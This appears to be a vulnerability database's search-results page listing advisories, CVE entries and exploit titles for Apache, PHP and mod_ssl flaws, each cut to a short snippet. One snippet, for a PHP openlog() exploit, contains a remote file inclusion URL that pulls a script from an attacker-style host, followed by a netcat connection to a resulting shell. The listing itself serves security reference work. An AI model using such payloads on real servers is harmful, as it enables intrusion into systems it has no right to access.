1187 matches found
phpDEV5 - System-Call Local Denial of Service
------------------------------------------------------------------------ PHPDev5 Target : PHPDev 5 URL : www.firepages.com.au - http://sourceforge.net/projects/phpdev5/ Type : PHP/Apache/MySQL Server.. .. PoC Sample : Save this code as .php or .php3 file.. //start //end milw0rm.com 2005-03-17...
RHEL 2.1 / 3 : mailman (RHSA-2005:136)
Updated mailman packages that correct a mailman security issue are now available. The mailman package is software to help manage email discussion lists. A flaw in the truepath function of Mailman was discovered. A remote attacker who is a member of a private mailman list could use a carefully...
DEBIAN-CVE-2004-0811
Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration...
PHP <= 4.3.7 openlog() Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ============================================== PHP http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt BOOM.... netcat www.vulnerable.box 65535 Microsoft Windows 2000 versie 5.00.2195 C Copyright 1985-2000...
AppServ 2.5.x and Prior Exploit
what AppServ ========== AppServ is the Apache/PHP/MySQL open source software installer packages. Objective : - Easy to buid Webserver and Database Server - For those who just beginning client/server programming. - For web programmers/developers using PHP & MySQL. - For programming techniques that...
RHEL 3 : httpd (RHSA-2004:562)
Updated httpd packages that include fixes for two security issues, as well as other bugs, are now available. The Apache HTTP server is a powerful, full-featured, efficient, and freely-available Web server. An issue has been discovered in the modssl module when configured to use the 'SSLCipherSuit...
Apache 2.0.52 Multiple Space Header DoS (Perl code)
Exploit for unknown platform in category dos / poc =================================================== Apache 2.0.52 Multiple Space Header DoS Perl code =================================================== !/usr/bin/perl Noam Rathaus of Beyond Security Ltd. use strict; use IO::Socket::INET; usage...
Debian DSA-137-1 : mm - insecure temporary files
Marcus Meissner and Sebastian Krahmer discovered and fixed a temporary file vulnerability in the mm shared memory library. This problem can be exploited to gain root access to a machine running Apache which is linked against this library, if shell access to the user 'www-data' is already availabl...
Debian DSA-195-1 : apache-perl - several vulnerabilities
According to David Wagner, iDEFENSE and the Apache HTTP Server Project, several vulnerabilities have been found in the Apache server package, a commonly used webserver. Most of the code is shared between the Apache and Apache-Perl packages, so vulnerabilities are shared as well. These...
PT-2004-1826 · Apache · Apache +1
Name of the Vulnerable Software and Affected Versions: Apache versions 2.0.50 and earlier Description: A buffer overflow occurs during the expansion of environment variables in configuration file parsing, allowing a local user to gain the privileges of an httpd child by forcing the server to pars...
security flaw
modssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service CPU consumption by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop...
CVE-1999-1199
The CVE-1999-1199 entry concerns Apache HTTP Server 1.3.1 and earlier. A remote attacker can trigger a denial of service by sending a large number of MIME headers with the same name (the so‑called “sioux” vulnerability). The NVD entry assigns a base score of 10.0 (HIGH) with NETWORK attack vector...
CVE-2004-0113
Memory leak in sslengineio.c for modssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service memory consumption via plain HTTP requests to the SSL port of an SSL-enabled server...
GLSA-200407-20 : Subversion: Vulnerability in mod_authz_svn
The remote host is affected by the vulnerability described in GLSA-200407-20 Subversion: Vulnerability in modauthzsvn Users with write access to part of a Subversion repository may bypass read restrictions on any part of that repository. This can be done using an 'svn copy' command to copy the...
mod_ssl: Format string vulnerability
Background modssl provides Secure Sockets Layer encryption and authentication to Apache 1.3. Description A bug in sslengineext.c makes modssl vulnerable to a ssllog related format string vulnerability in the modproxy hook functions. Impact Given the right server configuration, an attacker could...
PT-2004-1827 · Apache · Apache +1
Name of the Vulnerable Software and Affected Versions: Apache versions 2.0.50 and earlier Description: The issue allows remote attackers to cause a denial of service by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop, consuming CPU resources...
Apache: Buffer overflow in mod_ssl
Background Apache is the most popular Web server on the Internet. modssl provides Secure Sockets Layer encryption and authentication to Apache 1.3. Apache 2 contains the functionality of modssl. Description A bug in the function sslutiluuencodebinary in sslutil.c may lead to a remote buffer...
security flaw
Memory leak in sslengineio.c for modssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service memory consumption via plain HTTP requests to the SSL port of an SSL-enabled server...
PHP setting leaks from .htaccess files on virtual hosts
Background PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Description If the server configuration "php.ini" file has "registerglobals = on" and a request is made to one virtual host which has "phpadminflag...
apache2047.txt
APACHE HTTPD SERVER current version 2.0.47: How to return files in a Apache Deny All directory. The Directives controlling host access may be bypassed even if they have not permission to be override. 11 Jan 2004 DESCRIPTION Apache Web Server allows manage configurations via the main httpd.conf...